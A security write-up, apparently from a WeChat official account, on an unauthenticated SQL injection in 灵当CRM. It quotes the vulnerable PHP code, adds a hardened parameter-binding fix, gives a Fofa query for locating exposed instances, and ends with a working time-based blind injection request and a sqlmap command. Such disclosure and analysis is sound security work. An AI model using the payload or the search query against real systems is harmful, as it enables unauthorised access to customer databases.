0x00 Introduction
灵当CRM positions itself as an industry CRM solution for enterprises: digitised customer management, automated sales management, intelligent service management and integrated project management, forming a full-lifecycle digital management system aimed at sustained revenue growth. It is a new-generation personalised CRM focused on on-premises deployment, integrating management and finance systems, supporting a range of ERP interfaces, unifying data management, and sharing data across systems to remove information silos.
Fofa:body="include/js/ldAjax.js"
0x01 Vulnerability Analysis
/crm/WeiXinApp/marketing/index.php dispatches requests to controllers. It pulls in six controllers directly via require_once, then reads `module` from $_REQUEST as the module name and `action` as the name of the method to call. Nothing in this file checks for an authenticated session before the method named in `action` is invoked.
```php
<?php
header("Access-Control-Allow-Origin:*");
error_reporting(E_ALL^E_NOTICE^E_WARNING);
header('Content-Type:text/html;charset=UTF-8');
header("Access-Control-Allow-Methods: GET, POST, OPTIONS");
header("Access-Control-Allow-Headers: Origin, No-Cache, X-Requested-With, If-Modified-Since, Pragma, Last-Modified, Cache-Control, Expires, Content-Type, X-E4M-With");
$root_dir=dirname(dirname(dirname(__FILE__)));//get the application root directory
include($root_dir.'/includefile.php');
// require_once($root_dir.'/include/Zend/Json.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxCrawler.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxUsers.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxArticles.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxAmbassador.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/SmsSender.php');
require_once($root_dir.'/WeiXinApp/marketing/controller/WxOrder.php');
$obj = new WechatPublic($root_dir);
/***
 * Handles inserting WeChat-authorised users into the table
 */
if(isset($_REQUEST['function'])){
    // the method name comes straight from the request and is called without validation
    $function = $_REQUEST["function"];
    $res = $obj->$function();
    echo ldcrm_json_encode($res);
}
// action module
/**
 * Handles the common WeChat lead-generation article operations: fetching the article list, details, etc.
 */
$module = $_REQUEST['module'];
global $adb;
switch ($module){
    case "Articles":$controller = new WxArticles($adb,$root_dir);break;
    case "Users":$controller = new WxUsers($adb,$root_dir);break;
    case "Ambassador":$controller = new WxAmbassador($adb,$root_dir);break;
    case "SmsSender":$controller = new SmsSender($adb,$root_dir);break;
    case "WxOrder":$controller = new WxOrder($adb,$root_dir);break;
    default :$controller = new WechatPublic($root_dir);break;
}
if(isset($_REQUEST['action'])){
    // any public method of the selected controller can be reached by name; no auth check precedes this call
    $action = $_REQUEST['action'];
    $res = $controller->$action();
    if($action!="viewpdf"){
        if(isset($res['code'])){
            $code = $res['code'];
            unset($res['code']);
        }else{
            $code = 1;
        }
        $_REQUEST['diony'] = 'yes';
        ConvertTojsonString($code,$res,'success');
    }
}
```
The actual defect is in the getActionList method of the /crm/WeiXinApp/marketing/controller/WxUsers.php controller: it reads the userid parameter from $_REQUEST and concatenates it straight into the SQL query (operate and keyWords are interpolated into the same query string in the same way), which is what produces the injection.
```php
/**
 * @return array[]
 * @throws Exception
 * Get the visitor log list for the current user: like (thumbs-up), look (view), share (forward), copy (repost/claim)
 */
public function getActionList()
{
    $userid = $_REQUEST['userid'];
    $operate = $_REQUEST['operate'];
    $keyWords = $_REQUEST['keyWords'];
    $page = $_REQUEST['page'];
    $limit = 10;
    $start = $page*$limit;
    $where = "";
    if(empty($keyWords)){
        $where .= " 1=1 ";
    }else{
        $where .= " (locate(trim('$keyWords'),u.nickname)>0) "; // keyWords interpolated into the SQL string
    }
    if($operate == 'like'){
        $where .= " and (l.type = 'like' or l.type = 'unlike')";
    }else{
        $where .= " and l.type = '".$operate."'"; // operate concatenated into the SQL string
    }
    //exclude the user's own records
    $where .= " and l.wx_user_id<>".$userid; // userid concatenated unquoted: the injection point
    //$select_sql = "select u.nickname,u.avatar,a.title,l.createdtime,l.type from ld_wx_user_log l left join ld_articles a on l.articlesid=a.articlesid left join ld_wx_users u on u.id=a.wx_user_id where wx_user_id = ? and ".$where;
    // userid is bound for the first '?' but also already concatenated into $where above
    $count_sql = "select distinct u.id from ld_wx_user_log l inner join ld_articles a on l.articlesid=a.articlesid left join ld_wx_users u on u.id=l.wx_user_id where a.wx_user_id = ? and a.deleted=0 and ".$where;
    $count_res = $this->adb->pquery($count_sql,[$userid]);
    $totalRows = $this->adb->num_rows($count_res);
    $pages = ceil($totalRows/$limit);
    // ... (the page's excerpt of the method ends here)
}
```
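A hardened form of the same method, added here as an example and not taken from the project: every request-controlled value becomes a bound parameter, userid is validated as an integer and operate is restricted to the log types the original comment lists. It assumes, as the page's own `pquery($count_sql,[$userid])` call shows, that `$adb->pquery($sql, array $params)` binds each `?` placeholder; the class name and exception type are this example's choices.

```php
<?php
// Added hardening example (not the project's code). Assumes $adb->pquery($sql, array $params)
// binds each '?' placeholder, as the page's own pquery($count_sql, [$userid]) call does.
class WxUsersHardened
{
    private $adb;
    public function __construct($adb) { $this->adb = $adb; }

    public function getActionList()
    {
        // userid is a numeric id: validate it instead of concatenating it into the SQL text
        $userid = filter_var($_REQUEST['userid'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($userid === false) {
            throw new InvalidArgumentException('userid must be a positive integer');
        }
        // operate selects a log type; accept only the values the original comment lists
        $operate = $_REQUEST['operate'] ?? '';
        if (!in_array($operate, ['like', 'look', 'share', 'copy'], true)) {
            throw new InvalidArgumentException('unknown operate value');
        }
        $keyWords = trim((string)($_REQUEST['keyWords'] ?? ''));
        $page = max(0, (int)($_REQUEST['page'] ?? 0));
        $limit = 10;
        $start = $page * $limit;

        // Every request-controlled value is passed as a bound parameter; the SQL text stays fixed.
        $params = [$userid];              // first '?': a.wx_user_id
        $where = ' 1=1 ';
        if ($keyWords !== '') {
            $where .= ' and locate(?, u.nickname) > 0 ';
            $params[] = $keyWords;
        }
        if ($operate === 'like') {
            $where .= " and (l.type = 'like' or l.type = 'unlike') ";
        } else {
            $where .= ' and l.type = ? ';
            $params[] = $operate;
        }
        $where .= ' and l.wx_user_id <> ? ';  // exclude the user's own records, now bound
        $params[] = $userid;

        $count_sql = 'select distinct u.id from ld_wx_user_log l'
            . ' inner join ld_articles a on l.articlesid = a.articlesid'
            . ' left join ld_wx_users u on u.id = l.wx_user_id'
            . ' where a.wx_user_id = ? and a.deleted = 0 and ' . $where;
        $count_res = $this->adb->pquery($count_sql, $params);
        $totalRows = $this->adb->num_rows($count_res);
        $pages = ceil($totalRows / $limit);
        return ['totalRows' => $totalRows, 'pages' => $pages, 'start' => $start, 'limit' => $limit];
    }
}
```

The paged data query that follows in the real method should be built from the same `$params` array rather than from `$where` with interpolated values.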
0x02 Reproduction
Payload:
```http
GET /crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=%27%20AND%20(SELECT%203408%20FROM%20(SELECT(SLEEP(5)))HtiS)--%20cbVc HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
```
Python sqlmap.py -u "http://website/crm/WeiXinApp/marketing/index.php?module=Users&action=getActionList&userid=1" --level=3 --dbms=mysql
```
Tags: code audit, 0day, penetration testing, system, general, 0day, 闲鱼, 转转
To obtain the 灵当CRM source code, follow the official account and send 241013!
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the article's author and this official account assume no legal or joint liability. Please take note!!!
Originally published on the WeChat official account (星悦安全): (1day) 灵当CRM has an unauthenticated SQL injection vulnerability